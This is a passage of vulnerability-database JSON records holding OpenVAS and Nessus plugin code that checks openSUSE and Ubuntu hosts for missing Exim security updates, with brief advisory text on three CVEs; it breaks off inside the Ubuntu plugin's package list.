{"id": "OPENVAS:1361412562310851601", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)", "description": "The remote host is missing an update for the ", "published": "2017-08-30T00:00:00", "modified": "2020-01-31T00:00:00", "epss": [{"cve": "CVE-2016-1531", "epss": 0.00057, "percentile": 0.22118, "modified": "2023-11-24"}, {"cve": "CVE-2016-9963", "epss": 0.00397, "percentile": 0.70618, "modified": "2023-11-24"}, {"cve": "CVE-2017-1000369", "epss": 0.00288, "percentile": 0.6548, "modified": "2023-11-24"}], "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851601", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["2017:2289-1"], "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "immutableFields": [], "lastseen": "2020-01-31T18:28:04", "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2017-1000369"]}, {"type": "amazon", "idList": ["ALAS-2017-804"]}, {"type": "archlinux", "idList": ["ASA-201603-8", "ASA-201711-32"]}, {"type": "cve", "idList": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1001-1:275F5", "DEBIAN:DLA-762-1:0D8D2", "DEBIAN:DSA-3517-1:82080", "DEBIAN:DSA-3517-1:EFA69", "DEBIAN:DSA-3747-1:65DFE", "DEBIAN:DSA-3747-1:7D21A", "DEBIAN:DSA-3888-1:AEA40"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-1531", "DEBIANCVE:CVE-2016-9963", "DEBIANCVE:CVE-2017-1000369"]}, {"type": "exploitdb", "idList": ["EDB-ID:39535", "EDB-ID:39549", "EDB-ID:39702"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4D7480E2B540BD30AB455D1DDEFB98B3", "EXPLOITPACK:D13F3E1C0485FC1698443786E9BA6A42"]}, {"type": "fedora", "idList": ["FEDORA:27F05611D25E", "FEDORA:D9A2F6002DDF", "FEDORA:E514560A8F98"]}, {"type": "freebsd", "idList": ["7D09B9EE-E0BA-11E5-ABC4-6FB07AF136D2", "8C1A271D-56CF-11E7-B9FE-C13EB7BCBF4F", "E7002B26-CAAA-11E6-A76A-9F7324E5534E"]}, {"type": "gentoo", "idList": ["GLSA-201709-19"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-UNIX-LOCAL-EXIM_PERL_STARTUP-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889920"]}, {"type": "nessus", "idList": ["ALA_ALAS-2017-804.NASL", "DEBIAN_DLA-1001.NASL", "DEBIAN_DLA-762.NASL", "DEBIAN_DSA-3517.NASL", "DEBIAN_DSA-3747.NASL", "DEBIAN_DSA-3888.NASL", "FEDORA_2016-0E3CA94D88.NASL", "FEDORA_2016-E062971917.NASL", "FEDORA_2017-F5177F3A16.NASL", "FREEBSD_PKG_7D09B9EEE0BA11E5ABC46FB07AF136D2.NASL", "FREEBSD_PKG_8C1A271D56CF11E7B9FEC13EB7BCBF4F.NASL", "FREEBSD_PKG_E7002B26CAAA11E6A76A9F7324E5534E.NASL", "GENTOO_GLSA-201709-19.NASL", "JUNIPER_SPACE_JSA_10826.NASL", "OPENSUSE-2016-326.NASL", "OPENSUSE-2017-714.NASL", "OPENSUSE-2017-980.NASL", "OPENSUSE-2021-677.NASL", "UBUNTU_USN-2933-1.NASL", "UBUNTU_USN-3164-1.NASL", "UBUNTU_USN-3322-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105568", "OPENVAS:1361412562310106485", "OPENVAS:1361412562310703517", "OPENVAS:1361412562310703747", "OPENVAS:1361412562310703888", "OPENVAS:1361412562310807496", "OPENVAS:1361412562310842695", "OPENVAS:1361412562310843007", "OPENVAS:1361412562310843214", "OPENVAS:1361412562310851232", "OPENVAS:1361412562310851569", "OPENVAS:1361412562310873330", "OPENVAS:1361412562310891001", "OPENVAS:703517", "OPENVAS:703747", "OPENVAS:703888"]}, {"type": "osv", "idList": ["OSV:DLA-1001-1", "OSV:DSA-3517-1", "OSV:DSA-3888-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136124", "PACKETSTORM:136165", "PACKETSTORM:136694"]}, {"type": "prion", "idList": ["PRION:CVE-2016-1531", "PRION:CVE-2016-9963", "PRION:CVE-2017-1000369"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-9963", "RH:CVE-2017-1000369"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:0721-1", "OPENSUSE-SU-2017:1625-1", "OPENSUSE-SU-2017:2289-1", "OPENSUSE-SU-2021:0677-1", "OPENSUSE-SU-2021:0753-1", "OPENSUSE-SU-2021:0754-1"]}, {"type": "ubuntu", "idList": ["USN-2933-1", "USN-3164-1", "USN-3322-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-1531", "UB:CVE-2016-9963", "UB:CVE-2017-1000369"]}, {"type": "zdt", "idList": ["1337DAY-ID-25543", "1337DAY-ID-25544", "1337DAY-ID-25565"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2017-804"]}, {"type": "archlinux", "idList": ["ASA-201603-8"]}, {"type": "cve", "idList": ["CVE-2016-9963", "CVE-2017-1000369"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1001-1:275F5", "DEBIAN:DLA-762-1:0D8D2", "DEBIAN:DSA-3747-1:65DFE", "DEBIAN:DSA-3888-1:AEA40"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-1531", "DEBIANCVE:CVE-2016-9963", "DEBIANCVE:CVE-2017-1000369"]}, {"type": "exploitdb", "idList": ["EDB-ID:39535", "EDB-ID:39549"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D13F3E1C0485FC1698443786E9BA6A42"]}, {"type": "fedora", "idList": ["FEDORA:E514560A8F98"]}, {"type": "freebsd", "idList": ["7D09B9EE-E0BA-11E5-ABC4-6FB07AF136D2", "8C1A271D-56CF-11E7-B9FE-C13EB7BCBF4F"]}, {"type": "gentoo", "idList": ["GLSA-201709-19"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/LOCAL/EXIM_PERL_STARTUP"]}, {"type": "myhack58", "idList": ["MYHACK58:62201889920"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-1001.NASL", "DEBIAN_DSA-3517.NASL", "DEBIAN_DSA-3888.NASL", "FEDORA_2016-0E3CA94D88.NASL", "FEDORA_2016-E062971917.NASL", "FEDORA_2017-F5177F3A16.NASL", "FREEBSD_PKG_7D09B9EEE0BA11E5ABC46FB07AF136D2.NASL", "FREEBSD_PKG_8C1A271D56CF11E7B9FEC13EB7BCBF4F.NASL", "GENTOO_GLSA-201709-19.NASL", "OPENSUSE-2016-326.NASL", "OPENSUSE-2017-714.NASL", "UBUNTU_USN-3322-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106485", "OPENVAS:1361412562310873330", "OPENVAS:703747"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136694"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-9963", "RH:CVE-2017-1000369"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:1625-1"]}, {"type": "ubuntu", "idList": ["USN-3164-1", "USN-3322-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-9963", "UB:CVE-2017-1000369"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2016-1531", "epss": "0.000570000", "percentile": "0.215590000", "modified": "2023-03-15"}, {"cve": "CVE-2016-9963", "epss": "0.003970000", "percentile": "0.693690000", "modified": "2023-03-15"}, {"cve": "CVE-2017-1000369", "epss": "0.004430000", "percentile": "0.709220000", "modified": "2023-03-15"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1700858913, "score": 1700859993, "epss": 0}, "_internal": {"score_hash": "23ed15c938715ff5e6752cf0ff289cee"}, "pluginID": "1361412562310851601", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851601\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-08-30 07:23:21 +0200 (Wed, 30 Aug 2017)\");\n script_cve_id(\"CVE-2016-1531\", \"CVE-2016-9963\", \"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for exim (openSUSE-SU-2017:2289-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for exim fixes the following issues:\n\n Changes in exim:\n\n - specify users with ref:mail, to make them dynamic. (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to 'stack\n crash' local privilege escalation (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local users to gain\n privileges via the perl_startup argument.\n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n - Makefile tuning:\n + add sqlite support\n + disable WITH_OLD_DEMIME\n + enable AUTH_CYRUS_SASL\n + enable AUTH_TLS\n + enable SYSLOG_LONG_LINES\n + enable SUPPORT_PAM\n + MAX_NAMED_LIST=64\n + enable EXPERIMENTAL_DMARC\n + enable EXPERIMENTAL_EVENT\n + enable EXPERIMENTAL_PROXY\n + enable EXPERIMENTAL_CERTNAMES\n + enable EXPERIMENTAL_DSN\n + enable EXPERIMENTAL_DANE\n + enable EXPERIMENTAL_SOCKS\n + enable EXPERIMENTAL_INTERNATIONAL\");\n\n script_tag(name:\"affected\", value:\"exim on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2289-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~10.6.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debuginfo\", rpm:\"exim-debuginfo~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"exim-debugsource\", rpm:\"exim-debugsource~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon\", rpm:\"eximon~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximon-debuginfo\", rpm:\"eximon-debuginfo~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"eximstats-html\", rpm:\"eximstats-html~4.86.2~14.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "naslFamily": "SuSE Local Security Checks"}
{"nessus": [{"lastseen": "2023-12-08T14:58:56", "description": "This update for exim fixes the following issues :\n\nChanges in exim :\n\n - specify users with ref:mail, to make them dynamic.\n (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be exploited to 'stack crash' local privilege escalation (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL < 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local users to gain privileges via the perl_startup argument. \n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n\n - Makefile tuning :\n\n + add sqlite support\n\n + disable WITH_OLD_DEMIME\n\n + enable AUTH_CYRUS_SASL\n\n + enable AUTH_TLS\n\n + enable SYSLOG_LONG_LINES\n\n + enable SUPPORT_PAM\n\n + MAX_NAMED_LIST=64\n\n + enable EXPERIMENTAL_DMARC\n\n + enable EXPERIMENTAL_EVENT\n\n + enable EXPERIMENTAL_PROXY\n\n + enable EXPERIMENTAL_CERTNAMES\n\n + enable EXPERIMENTAL_DSN\n\n + enable EXPERIMENTAL_DANE\n\n + enable EXPERIMENTAL_SOCKS\n\n + enable EXPERIMENTAL_INTERNATIONAL", "cvss3": {}, "published": "2017-08-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : exim (openSUSE-2017-980) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531", "CVE-2016-9963", "CVE-2017-1000369"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exim", "p-cpe:/a:novell:opensuse:exim-debuginfo", "p-cpe:/a:novell:opensuse:exim-debugsource", "p-cpe:/a:novell:opensuse:eximon", "p-cpe:/a:novell:opensuse:eximon-debuginfo", "p-cpe:/a:novell:opensuse:eximstats-html", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2017-980.NASL", "href": "https://www.tenable.com/plugins/nessus/102834", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-980.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102834);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1531\", \"CVE-2016-9963\", \"CVE-2017-1000369\");\n\n script_name(english:\"openSUSE Security Update : exim (openSUSE-2017-980) (Stack Clash)\");\n script_summary(english:\"Check for the openSUSE-2017-980 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for exim fixes the following issues :\n\nChanges in exim :\n\n - specify users with ref:mail, to make them dynamic.\n (boo#1046971)\n\n - CVE-2017-1000369: Fixed memory leaks that could be\n exploited to 'stack crash' local privilege escalation\n (boo#1044692)\n\n - Require user(mail) group(mail) to meet new users\n handling in TW.\n\n - Prerequire permissions (fixes rpmlint).\n\n - conditionally disable DANE on SuSE versions with OpenSSL\n < 1.0\n\n - CVE-2016-1531: when installed setuid root, allows local\n users to gain privileges via the perl_startup argument. \n\n - CVE-2016-9963: DKIM information leakage (boo#1015930)\n\n\n\n - Makefile tuning :\n\n + add sqlite support\n\n + disable WITH_OLD_DEMIME\n\n + enable AUTH_CYRUS_SASL\n\n + enable AUTH_TLS\n\n + enable SYSLOG_LONG_LINES\n\n + enable SUPPORT_PAM\n\n + MAX_NAMED_LIST=64\n\n + enable EXPERIMENTAL_DMARC\n\n + enable EXPERIMENTAL_EVENT\n\n + enable EXPERIMENTAL_PROXY\n\n + enable EXPERIMENTAL_CERTNAMES\n\n + enable EXPERIMENTAL_DSN\n\n + enable EXPERIMENTAL_DANE\n\n + enable EXPERIMENTAL_SOCKS\n\n + enable EXPERIMENTAL_INTERNATIONAL\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1015930\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1044692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1046971\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exim-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:eximstats-html\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debuginfo-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"exim-debugsource-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximon-debuginfo-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"eximstats-html-4.86.2-10.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debuginfo-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"exim-debugsource-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximon-debuginfo-4.86.2-14.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"eximstats-html-4.86.2-14.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-debugsource / eximon / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:48:37", "description": "Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In certain configurations, private DKIM signing keys could be leaked to the log files.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-01-06T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS : Exim vulnerability (USN-3164-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy", "p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light", "p-cpe:/a:canonical:ubuntu_linux:exim4-dev", "p-cpe:/a:canonical:ubuntu_linux:eximon4", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts", "cpe:/o:canonical:ubuntu_linux:16.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:exim4", "p-cpe:/a:canonical:ubuntu_linux:exim4-base", "p-cpe:/a:canonical:ubuntu_linux:exim4-config"], "id": "UBUNTU_USN-3164-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96336", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3164-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96336);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"USN\", value:\"3164-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS : Exim vulnerability (USN-3164-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Bjoern Jacke discovered that Exim incorrectly handled DKIM keys. In\ncertain configurations, private DKIM signing keys could be leaked to\nthe log files.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-3164-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9963\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:exim4-config\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release || '16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04 / 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '14.04', 'pkgname': 'exim4', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-base', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-config', 